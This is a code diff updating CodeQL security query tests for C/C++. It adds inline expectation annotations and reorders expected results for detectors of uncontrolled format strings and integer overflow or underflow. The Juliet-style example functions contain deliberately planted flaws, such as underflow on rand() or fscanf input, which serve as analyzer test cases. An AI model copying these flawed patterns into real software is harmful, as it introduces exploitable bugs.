@@ -1,3 +1,15 @@ +#select +| ifs.c:62:9:62:10 | *c7 | ifs.c:16:27:16:30 | **argv | ifs.c:62:9:62:10 | *c7 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | +| ifs.c:69:9:69:10 | *c8 | ifs.c:16:27:16:30 | **argv | ifs.c:69:9:69:10 | *c8 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | +| ifs.c:75:9:75:10 | *i1 | ifs.c:16:27:16:30 | **argv | ifs.c:75:9:75:10 | *i1 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | +| ifs.c:81:9:81:10 | *i2 | ifs.c:16:27:16:30 | **argv | ifs.c:81:9:81:10 | *i2 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | +| ifs.c:87:9:87:10 | *i3 | ifs.c:16:27:16:30 | **argv | ifs.c:87:9:87:10 | *i3 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | +| ifs.c:93:9:93:10 | *i4 | ifs.c:16:27:16:30 | **argv | ifs.c:93:9:93:10 | *i4 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | +| ifs.c:99:9:99:10 | *i5 | ifs.c:16:27:16:30 | **argv | ifs.c:99:9:99:10 | *i5 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | +| ifs.c:106:9:106:10 | *i6 | ifs.c:16:27:16:30 | **argv | ifs.c:106:9:106:10 | *i6 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). 
| ifs.c:16:27:16:30 | **argv | a command-line argument | +| ifs.c:112:9:112:10 | *i7 | ifs.c:16:27:16:30 | **argv | ifs.c:112:9:112:10 | *i7 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | +| ifs.c:118:9:118:10 | *i8 | ifs.c:16:27:16:30 | **argv | ifs.c:118:9:118:10 | *i8 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | +| ifs.c:124:9:124:10 | *i9 | ifs.c:16:27:16:30 | **argv | ifs.c:124:9:124:10 | *i9 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | edges | ifs.c:16:27:16:30 | **argv | ifs.c:61:3:61:14 | *... = ... | provenance | | | ifs.c:16:27:16:30 | **argv | ifs.c:68:3:68:14 | *... = ... | provenance | | 
@@ -46,15 +58,3 @@ nodes | ifs.c:123:3:123:14 | *... = ... | semmle.label | *... = ... | | ifs.c:124:9:124:10 | *i9 | semmle.label | *i9 | subpaths -#select -| ifs.c:62:9:62:10 | *c7 | ifs.c:16:27:16:30 | **argv | ifs.c:62:9:62:10 | *c7 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | -| ifs.c:69:9:69:10 | *c8 | ifs.c:16:27:16:30 | **argv | ifs.c:69:9:69:10 | *c8 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | -| ifs.c:75:9:75:10 | *i1 | ifs.c:16:27:16:30 | **argv | ifs.c:75:9:75:10 | *i1 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | -| ifs.c:81:9:81:10 | *i2 | ifs.c:16:27:16:30 | **argv | ifs.c:81:9:81:10 | *i2 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | -| ifs.c:87:9:87:10 | *i3 | ifs.c:16:27:16:30 | **argv | ifs.c:87:9:87:10 | *i3 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | -| ifs.c:93:9:93:10 | *i4 | ifs.c:16:27:16:30 | **argv | ifs.c:93:9:93:10 | *i4 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | -| ifs.c:99:9:99:10 | *i5 | ifs.c:16:27:16:30 | **argv | ifs.c:99:9:99:10 | *i5 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). 
| ifs.c:16:27:16:30 | **argv | a command-line argument | -| ifs.c:106:9:106:10 | *i6 | ifs.c:16:27:16:30 | **argv | ifs.c:106:9:106:10 | *i6 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | -| ifs.c:112:9:112:10 | *i7 | ifs.c:16:27:16:30 | **argv | ifs.c:112:9:112:10 | *i7 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | -| ifs.c:118:9:118:10 | *i8 | ifs.c:16:27:16:30 | **argv | ifs.c:118:9:118:10 | *i8 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | -| ifs.c:124:9:124:10 | *i9 | ifs.c:16:27:16:30 | **argv | ifs.c:124:9:124:10 | *i9 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/ifs/ifs.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/ifs/ifs.qlref index 079e0c8a7c0e..9c363bfac55e 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/ifs/ifs.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/ifs/ifs.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-134/UncontrolledFormatString.ql \ No newline at end of file +query: Security/CWE/CWE-134/UncontrolledFormatString.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-190/SAMATE/ArithmeticTainted.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-190/SAMATE/ArithmeticTainted.expected index a2221ec2fd3f..b1a17aac3623 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-190/SAMATE/ArithmeticTainted.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-190/SAMATE/ArithmeticTainted.expected 
@@ -1,8 +1,8 @@
+#select
+| examples.cpp:66:11:66:14 | data | examples.cpp:63:26:63:30 | fscanf output argument | examples.cpp:66:11:66:14 | data | $@ flows to an operand of an arithmetic expression, potentially causing an underflow. | examples.cpp:63:26:63:30 | fscanf output argument | value read by fscanf |
 edges
 | examples.cpp:63:26:63:30 | fscanf output argument | examples.cpp:66:11:66:14 | data | provenance | |
 nodes
 | examples.cpp:63:26:63:30 | fscanf output argument | semmle.label | fscanf output argument |
 | examples.cpp:66:11:66:14 | data | semmle.label | data |
 subpaths
-#select
-| examples.cpp:66:11:66:14 | data | examples.cpp:63:26:63:30 | fscanf output argument | examples.cpp:66:11:66:14 | data | $@ flows to an operand of an arithmetic expression, potentially causing an underflow. | examples.cpp:63:26:63:30 | fscanf output argument | value read by fscanf |
diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-190/SAMATE/ArithmeticTainted.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-190/SAMATE/ArithmeticTainted.qlref
index 3939653db1c3..d8fb26f7e023 100644
--- a/cpp/ql/test/query-tests/Security/CWE/CWE-190/SAMATE/ArithmeticTainted.qlref
+++ b/cpp/ql/test/query-tests/Security/CWE/CWE-190/SAMATE/ArithmeticTainted.qlref
@@ -1 +1,2 @@
-Security/CWE/CWE-190/ArithmeticTainted.ql
+query: Security/CWE/CWE-190/ArithmeticTainted.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-190/SAMATE/ArithmeticUncontrolled.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-190/SAMATE/ArithmeticUncontrolled.expected
index dbc1a99858e9..24e8043d7dbf 100644
--- a/cpp/ql/test/query-tests/Security/CWE/CWE-190/SAMATE/ArithmeticUncontrolled.expected
+++ b/cpp/ql/test/query-tests/Security/CWE/CWE-190/SAMATE/ArithmeticUncontrolled.expected
@@ -1,3 +1,16 @@ +#select +| examples.cpp:25:31:25:34 | data | examples.cpp:22:26:22:33 | call to rand | examples.cpp:25:31:25:34 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:22:26:22:33 | call to rand | uncontrolled value | +| examples.cpp:25:31:25:34 | data | examples.cpp:22:26:22:33 | call to rand | examples.cpp:25:31:25:34 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:22:26:22:33 | call to rand | uncontrolled value | +| examples.cpp:25:31:25:34 | data | examples.cpp:22:26:22:33 | call to rand | examples.cpp:25:31:25:34 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:22:26:22:33 | call to rand | uncontrolled value | +| examples.cpp:25:31:25:34 | data | examples.cpp:22:26:22:33 | call to rand | examples.cpp:25:31:25:34 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:22:26:22:33 | call to rand | uncontrolled value | +| examples.cpp:25:31:25:34 | data | examples.cpp:22:26:22:33 | call to rand | examples.cpp:25:31:25:34 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:22:26:22:33 | call to rand | uncontrolled value | +| examples.cpp:25:31:25:34 | data | examples.cpp:22:26:22:33 | call to rand | examples.cpp:25:31:25:34 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:22:26:22:33 | call to rand | uncontrolled value | +| examples.cpp:38:9:38:12 | data | examples.cpp:35:26:35:33 | call to rand | examples.cpp:38:9:38:12 | data | This arithmetic expression depends on an $@, potentially causing an underflow. 
| examples.cpp:35:26:35:33 | call to rand | uncontrolled value | +| examples.cpp:38:9:38:12 | data | examples.cpp:35:26:35:33 | call to rand | examples.cpp:38:9:38:12 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:35:26:35:33 | call to rand | uncontrolled value | +| examples.cpp:38:9:38:12 | data | examples.cpp:35:26:35:33 | call to rand | examples.cpp:38:9:38:12 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:35:26:35:33 | call to rand | uncontrolled value | +| examples.cpp:38:9:38:12 | data | examples.cpp:35:26:35:33 | call to rand | examples.cpp:38:9:38:12 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:35:26:35:33 | call to rand | uncontrolled value | +| examples.cpp:38:9:38:12 | data | examples.cpp:35:26:35:33 | call to rand | examples.cpp:38:9:38:12 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:35:26:35:33 | call to rand | uncontrolled value | +| examples.cpp:38:9:38:12 | data | examples.cpp:35:26:35:33 | call to rand | examples.cpp:38:9:38:12 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:35:26:35:33 | call to rand | uncontrolled value | edges | examples.cpp:22:5:22:33 | ... = ... | examples.cpp:25:31:25:34 | data | provenance | | | examples.cpp:22:26:22:33 | call to rand | examples.cpp:22:5:22:33 | ... = ... | provenance | | 
@@ -31,16 +44,3 @@ nodes | examples.cpp:35:26:35:33 | call to rand | semmle.label | call to rand | | examples.cpp:38:9:38:12 | data | semmle.label | data | subpaths -#select -| examples.cpp:25:31:25:34 | data | examples.cpp:22:26:22:33 | call to rand | examples.cpp:25:31:25:34 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:22:26:22:33 | call to rand | uncontrolled value | -| examples.cpp:25:31:25:34 | data | examples.cpp:22:26:22:33 | call to rand | examples.cpp:25:31:25:34 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:22:26:22:33 | call to rand | uncontrolled value | -| examples.cpp:25:31:25:34 | data | examples.cpp:22:26:22:33 | call to rand | examples.cpp:25:31:25:34 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:22:26:22:33 | call to rand | uncontrolled value | -| examples.cpp:25:31:25:34 | data | examples.cpp:22:26:22:33 | call to rand | examples.cpp:25:31:25:34 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:22:26:22:33 | call to rand | uncontrolled value | -| examples.cpp:25:31:25:34 | data | examples.cpp:22:26:22:33 | call to rand | examples.cpp:25:31:25:34 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:22:26:22:33 | call to rand | uncontrolled value | -| examples.cpp:25:31:25:34 | data | examples.cpp:22:26:22:33 | call to rand | examples.cpp:25:31:25:34 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:22:26:22:33 | call to rand | uncontrolled value | -| examples.cpp:38:9:38:12 | data | examples.cpp:35:26:35:33 | call to rand | examples.cpp:38:9:38:12 | data | This arithmetic expression depends on an $@, potentially causing an underflow. 
| examples.cpp:35:26:35:33 | call to rand | uncontrolled value | -| examples.cpp:38:9:38:12 | data | examples.cpp:35:26:35:33 | call to rand | examples.cpp:38:9:38:12 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:35:26:35:33 | call to rand | uncontrolled value | -| examples.cpp:38:9:38:12 | data | examples.cpp:35:26:35:33 | call to rand | examples.cpp:38:9:38:12 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:35:26:35:33 | call to rand | uncontrolled value | -| examples.cpp:38:9:38:12 | data | examples.cpp:35:26:35:33 | call to rand | examples.cpp:38:9:38:12 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:35:26:35:33 | call to rand | uncontrolled value | -| examples.cpp:38:9:38:12 | data | examples.cpp:35:26:35:33 | call to rand | examples.cpp:38:9:38:12 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:35:26:35:33 | call to rand | uncontrolled value | -| examples.cpp:38:9:38:12 | data | examples.cpp:35:26:35:33 | call to rand | examples.cpp:38:9:38:12 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:35:26:35:33 | call to rand | uncontrolled value | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-190/SAMATE/ArithmeticUncontrolled.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-190/SAMATE/ArithmeticUncontrolled.qlref index 1fcafc3ca1c8..e18d0e08a87f 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-190/SAMATE/ArithmeticUncontrolled.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-190/SAMATE/ArithmeticUncontrolled.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-190/ArithmeticUncontrolled.ql +query: Security/CWE/CWE-190/ArithmeticUncontrolled.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-190/SAMATE/ArithmeticWithExtremeValues.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-190/SAMATE/ArithmeticWithExtremeValues.qlref index ab2c35ce59b2..0109cee57cf7 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-190/SAMATE/ArithmeticWithExtremeValues.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-190/SAMATE/ArithmeticWithExtremeValues.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-190/ArithmeticWithExtremeValues.ql +query: Security/CWE/CWE-190/ArithmeticWithExtremeValues.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-190/SAMATE/IntegerOverflowTainted.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-190/SAMATE/IntegerOverflowTainted.qlref index df42008c632b..419ed80f3b9e 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-190/SAMATE/IntegerOverflowTainted.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-190/SAMATE/IntegerOverflowTainted.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-190/IntegerOverflowTainted.ql +query: Security/CWE/CWE-190/IntegerOverflowTainted.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-190/SAMATE/examples.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-190/SAMATE/examples.cpp index b2cdbbe7133f..3fab05fc20cb 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-190/SAMATE/examples.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-190/SAMATE/examples.cpp @@ -19,10 +19,10 @@ void CWE191_Integer_Underflow__unsigned_int_rand_sub_01_bad() unsigned int data; data = 0; /* POTENTIAL FLAW: Use a random value */ - data = (unsigned int)RAND32(); + data = (unsigned int)RAND32(); // $ Source[cpp/uncontrolled-arithmetic] { /* POTENTIAL FLAW: Subtracting 1 from data could cause an underflow */ - unsigned int result = data - 1; + unsigned int result = data - 1; // $ Alert[cpp/uncontrolled-arithmetic] printUnsignedLine(result); } } 
@@ -32,10 +32,10 @@ void CWE191_Integer_Underflow__unsigned_int_rand_postdec_01_bad() unsigned int data; data = 0; /* POTENTIAL FLAW: Use a random value */ - data = (unsigned int)RAND32(); + data = (unsigned int)RAND32(); // $ Source[cpp/uncontrolled-arithmetic] { /* POTENTIAL FLAW: Decrementing data could cause an underflow */ - data--; + data--; // $ Alert[cpp/uncontrolled-arithmetic] unsigned int result = data; printUnsignedLine(result); } @@ -60,10 +60,10 @@ void CWE191_Integer_Underflow__unsigned_int_fscanf_predec_01_bad() unsigned int data; data = 0; /* POTENTIAL FLAW: Use a value input from the console */ - fscanf (stdin, "%u", &data); + fscanf (stdin, "%u", &data); // $ Source[cpp/tainted-arithmetic] { /* POTENTIAL FLAW: Decrementing data could cause an underflow */ - --data; + --data; // $ Alert[cpp/integer-overflow-tainted] Alert[cpp/tainted-arithmetic] unsigned int result = data; printUnsignedLine(result); } diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/ArithmeticUncontrolled/ArithmeticUncontrolled.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/ArithmeticUncontrolled/ArithmeticUncontrolled.expected index 97bd3603cd3c..c07119831d7e 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/ArithmeticUncontrolled/ArithmeticUncontrolled.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/ArithmeticUncontrolled/ArithmeticUncontrolled.expected 
@@ -1,3 +1,31 @@ +#select +| test.c:21:17:21:17 | r | test.c:18:13:18:16 | call to rand | test.c:21:17:21:17 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:18:13:18:16 | call to rand | uncontrolled value | +| test.c:35:5:35:5 | r | test.c:34:13:34:18 | call to rand | test.c:35:5:35:5 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:34:13:34:18 | call to rand | uncontrolled value | +| test.c:45:5:45:5 | r | test.c:44:13:44:16 | call to rand | test.c:45:5:45:5 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:44:13:44:16 | call to rand | uncontrolled value | +| test.c:77:9:77:9 | r | test.c:75:13:75:19 | call to rand | test.c:77:9:77:9 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:75:13:75:19 | call to rand | uncontrolled value | +| test.c:77:9:77:9 | r | test.c:75:13:75:19 | call to rand | test.c:77:9:77:9 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:75:13:75:19 | call to rand | uncontrolled value | +| test.c:83:9:83:9 | r | test.c:81:14:81:17 | call to rand | test.c:83:9:83:9 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:81:14:81:17 | call to rand | uncontrolled value | +| test.c:83:9:83:9 | r | test.c:81:23:81:26 | call to rand | test.c:83:9:83:9 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:81:23:81:26 | call to rand | uncontrolled value | +| test.c:127:9:127:9 | r | test.c:125:13:125:16 | call to rand | test.c:127:9:127:9 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:125:13:125:16 | call to rand | uncontrolled value | +| test.c:133:5:133:5 | r | test.c:131:13:131:16 | call to rand | test.c:133:5:133:5 | r | This arithmetic expression depends on an $@, potentially causing an overflow. 
| test.c:131:13:131:16 | call to rand | uncontrolled value | +| test.c:139:10:139:10 | r | test.c:137:13:137:16 | call to rand | test.c:139:10:139:10 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:137:13:137:16 | call to rand | uncontrolled value | +| test.c:157:9:157:9 | r | test.c:155:22:155:27 | call to rand | test.c:157:9:157:9 | r | This arithmetic expression depends on an $@, potentially causing an underflow. | test.c:155:22:155:25 | call to rand | uncontrolled value | +| test.cpp:25:7:25:7 | r | test.cpp:8:9:8:12 | call to rand | test.cpp:25:7:25:7 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:8:9:8:12 | call to rand | uncontrolled value | +| test.cpp:31:7:31:7 | r | test.cpp:13:10:13:13 | call to rand | test.cpp:31:7:31:7 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:13:10:13:13 | call to rand | uncontrolled value | +| test.cpp:37:7:37:7 | r | test.cpp:18:9:18:12 | call to rand | test.cpp:37:7:37:7 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:18:9:18:12 | call to rand | uncontrolled value | +| test.cpp:65:9:65:9 | x | test.cpp:62:19:62:24 | call to rand | test.cpp:65:9:65:9 | x | This arithmetic expression depends on an $@, potentially causing an underflow. | test.cpp:62:19:62:22 | call to rand | uncontrolled value | +| test.cpp:90:10:90:10 | x | test.cpp:86:10:86:13 | call to rand | test.cpp:90:10:90:10 | x | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:86:10:86:13 | call to rand | uncontrolled value | +| test.cpp:102:10:102:10 | x | test.cpp:98:10:98:13 | call to rand | test.cpp:102:10:102:10 | x | This arithmetic expression depends on an $@, potentially causing an overflow. 
| test.cpp:98:10:98:13 | call to rand | uncontrolled value | +| test.cpp:146:9:146:9 | y | test.cpp:137:10:137:13 | call to rand | test.cpp:146:9:146:9 | y | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:137:10:137:13 | call to rand | uncontrolled value | +| test.cpp:154:10:154:10 | b | test.cpp:151:10:151:13 | call to rand | test.cpp:154:10:154:10 | b | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:151:10:151:13 | call to rand | uncontrolled value | +| test.cpp:171:11:171:16 | y | test.cpp:169:11:169:14 | call to rand | test.cpp:171:11:171:16 | y | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:169:11:169:14 | call to rand | uncontrolled value | +| test.cpp:196:7:196:7 | x | test.cpp:189:10:189:13 | call to rand | test.cpp:196:7:196:7 | x | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:189:10:189:13 | call to rand | uncontrolled value | +| test.cpp:198:7:198:7 | x | test.cpp:189:10:189:13 | call to rand | test.cpp:198:7:198:7 | x | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:189:10:189:13 | call to rand | uncontrolled value | +| test.cpp:199:7:199:7 | x | test.cpp:189:10:189:13 | call to rand | test.cpp:199:7:199:7 | x | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:189:10:189:13 | call to rand | uncontrolled value | +| test.cpp:204:7:204:7 | y | test.cpp:190:10:190:13 | call to rand | test.cpp:204:7:204:7 | y | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:190:10:190:13 | call to rand | uncontrolled value | +| test.cpp:205:7:205:7 | y | test.cpp:190:10:190:13 | call to rand | test.cpp:205:7:205:7 | y | This arithmetic expression depends on an $@, potentially causing an overflow. 
| test.cpp:190:10:190:13 | call to rand | uncontrolled value | +| test.cpp:208:7:208:7 | y | test.cpp:190:10:190:13 | call to rand | test.cpp:208:7:208:7 | y | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:190:10:190:13 | call to rand | uncontrolled value | +| test.cpp:219:8:219:8 | x | test.cpp:215:11:215:14 | call to rand | test.cpp:219:8:219:8 | x | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:215:11:215:14 | call to rand | uncontrolled value | edges | test.c:18:13:18:16 | call to rand | test.c:18:13:18:16 | call to rand | provenance | | | test.c:18:13:18:16 | call to rand | test.c:21:17:21:17 | r | provenance | | 
@@ -146,31 +174,3 @@ nodes | test.cpp:215:11:215:14 | call to rand | semmle.label | call to rand | | test.cpp:219:8:219:8 | x | semmle.label | x | subpaths -#select -| test.c:21:17:21:17 | r | test.c:18:13:18:16 | call to rand | test.c:21:17:21:17 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:18:13:18:16 | call to rand | uncontrolled value | -| test.c:35:5:35:5 | r | test.c:34:13:34:18 | call to rand | test.c:35:5:35:5 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:34:13:34:18 | call to rand | uncontrolled value | -| test.c:45:5:45:5 | r | test.c:44:13:44:16 | call to rand | test.c:45:5:45:5 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:44:13:44:16 | call to rand | uncontrolled value | -| test.c:77:9:77:9 | r | test.c:75:13:75:19 | call to rand | test.c:77:9:77:9 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:75:13:75:19 | call to rand | uncontrolled value | -| test.c:77:9:77:9 | r | test.c:75:13:75:19 | call to rand | test.c:77:9:77:9 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:75:13:75:19 | call to rand | uncontrolled value | -| test.c:83:9:83:9 | r | test.c:81:14:81:17 | call to rand | test.c:83:9:83:9 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:81:14:81:17 | call to rand | uncontrolled value | -| test.c:83:9:83:9 | r | test.c:81:23:81:26 | call to rand | test.c:83:9:83:9 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:81:23:81:26 | call to rand | uncontrolled value | -| test.c:127:9:127:9 | r | test.c:125:13:125:16 | call to rand | test.c:127:9:127:9 | r | This arithmetic expression depends on an $@, potentially causing an overflow. 
| test.c:125:13:125:16 | call to rand | uncontrolled value | -| test.c:133:5:133:5 | r | test.c:131:13:131:16 | call to rand | test.c:133:5:133:5 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:131:13:131:16 | call to rand | uncontrolled value | -| test.c:139:10:139:10 | r | test.c:137:13:137:16 | call to rand | test.c:139:10:139:10 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:137:13:137:16 | call to rand | uncontrolled value | -| test.c:157:9:157:9 | r | test.c:155:22:155:27 | call to rand | test.c:157:9:157:9 | r | This arithmetic expression depends on an $@, potentially causing an underflow. | test.c:155:22:155:25 | call to rand | uncontrolled value | -| test.cpp:25:7:25:7 | r | test.cpp:8:9:8:12 | call to rand | test.cpp:25:7:25:7 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:8:9:8:12 | call to rand | uncontrolled value | -| test.cpp:31:7:31:7 | r | test.cpp:13:10:13:13 | call to rand | test.cpp:31:7:31:7 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:13:10:13:13 | call to rand | uncontrolled value | -| test.cpp:37:7:37:7 | r | test.cpp:18:9:18:12 | call to rand | test.cpp:37:7:37:7 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:18:9:18:12 | call to rand | uncontrolled value | -| test.cpp:65:9:65:9 | x | test.cpp:62:19:62:24 | call to rand | test.cpp:65:9:65:9 | x | This arithmetic expression depends on an $@, potentially causing an underflow. | test.cpp:62:19:62:22 | call to rand | uncontrolled value | -| test.cpp:90:10:90:10 | x | test.cpp:86:10:86:13 | call to rand | test.cpp:90:10:90:10 | x | This arithmetic expression depends on an $@, potentially causing an overflow. 
| test.cpp:86:10:86:13 | call to rand | uncontrolled value | -| test.cpp:102:10:102:10 | x | test.cpp:98:10:98:13 | call to rand | test.cpp:102:10:102:10 | x | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:98:10:98:13 | call to rand | uncontrolled value | -| test.cpp:146:9:146:9 | y | test.cpp:137:10:137:13 | call to rand | test.cpp:146:9:146:9 | y | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:137:10:137:13 | call to rand | uncontrolled value | -| test.cpp:154:10:154:10 | b | test.cpp:151:10:151:13 | call to rand | test.cpp:154:10:154:10 | b | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:151:10:151:13 | call to rand | uncontrolled value | -| test.cpp:171:11:171:16 | y | test.cpp:169:11:169:14 | call to rand | test.cpp:171:11:171:16 | y | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:169:11:169:14 | call to rand | uncontrolled value | -| test.cpp:196:7:196:7 | x | test.cpp:189:10:189:13 | call to rand | test.cpp:196:7:196:7 | x | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:189:10:189:13 | call to rand | uncontrolled value | -| test.cpp:198:7:198:7 | x | test.cpp:189:10:189:13 | call to rand | test.cpp:198:7:198:7 | x | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:189:10:189:13 | call to rand | uncontrolled value | -| test.cpp:199:7:199:7 | x | test.cpp:189:10:189:13 | call to rand | test.cpp:199:7:199:7 | x | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:189:10:189:13 | call to rand | uncontrolled value | -| test.cpp:204:7:204:7 | y | test.cpp:190:10:190:13 | call to rand | 